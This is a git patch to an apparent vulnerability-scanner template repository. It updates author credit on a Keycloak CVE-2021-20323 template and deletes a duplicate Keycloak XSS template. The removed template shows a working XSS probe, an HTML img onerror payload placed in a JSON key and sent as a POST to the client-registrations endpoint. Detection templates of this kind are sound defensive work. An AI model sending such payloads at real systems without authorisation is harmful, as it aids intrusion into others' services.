From a5bbd9593e299d3211d0bca0e4c8ae86bb34361d Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Mon, 4 Dec 2023 09:15:30 +0530
Subject: [PATCH] Delete Duplicate Template

---
 http/cves/2021/CVE-2021-20323.yaml           |  2 +-
 http/vulnerabilities/other/keycloak-xss.yaml | 37 --------------------
 2 files changed, 1 insertion(+), 38 deletions(-)
 delete mode 100644 http/vulnerabilities/other/keycloak-xss.yaml

diff --git a/http/cves/2021/CVE-2021-20323.yaml b/http/cves/2021/CVE-2021-20323.yaml
index a65e2fc39b..e3e1cf1b00 100644
--- a/http/cves/2021/CVE-2021-20323.yaml
+++ b/http/cves/2021/CVE-2021-20323.yaml
@@ -2,7 +2,7 @@ id: CVE-2021-20323
 
 info:
   name: Keycloak 10.0.0 - 18.0.0 - Cross-Site Scripting
-  author: ndmalc
+  author: ndmalc,incogbyte
   severity: medium
   description: |
     Keycloak 10.0.0 to 18.0.0 contains a cross-site scripting vulnerability via the client-registrations endpoint. On a POST request, the application does not sanitize an unknown attribute name before including it in the error response with a 'Content-Type' of text/hml. Once reflected, the response is interpreted as HTML. This can be performed on any realm present on the Keycloak instance. Since the bug requires Content-Type application/json and is submitted via a POST, there is no common path to exploit that has a user impact.
diff --git a/http/vulnerabilities/other/keycloak-xss.yaml b/http/vulnerabilities/other/keycloak-xss.yaml
deleted file mode 100644
index d8a02d998a..0000000000
--- a/http/vulnerabilities/other/keycloak-xss.yaml
+++ /dev/null
@@ -1,37 +0,0 @@
-id: keycloak-xss
-
-info:
-  name: Keycloak <= 8.0 - Cross-Site Scripting
-  author: incogbyte
-  severity: medium
-  description: Keycloak 8.0 and prior contains a cross-site scripting vulnerability. An attacker can execute arbitrary script and thus steal cookie-based authentication credentials and launch other attacks.
-  reference:
-    - https://cure53.de/pentest-report_keycloak.pdf
-  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
-    cvss-score: 5.4
-    cwe-id: CWE-80
-  metadata:
-    max-request: 1
-  tags: keycloak,xss
-
-http:
-  - raw:
-      - |
-        POST /auth/realms/master/clients-registrations/openid-connect HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/json
-
-        {"<img onerror=confirm(1337) src/>":1}
-
-    matchers-condition: and
-    matchers:
-      - type: status
-        status:
-          - 400
-
-      - type: word
-        words:
-          - 'Unrecognized field "<img onerror=confirm(1337) src/>"'
-
-# digest: 4b0a0048304602210093245586247588fc18bbafa0b7703409feb209b43eacaf3337ea76ea833227ed022100983104bf5b692534f304895471bc0ca7d9e8d9787070ba2222cbd19bd0d95c11:922c64590222798bb761d5b6d8e72950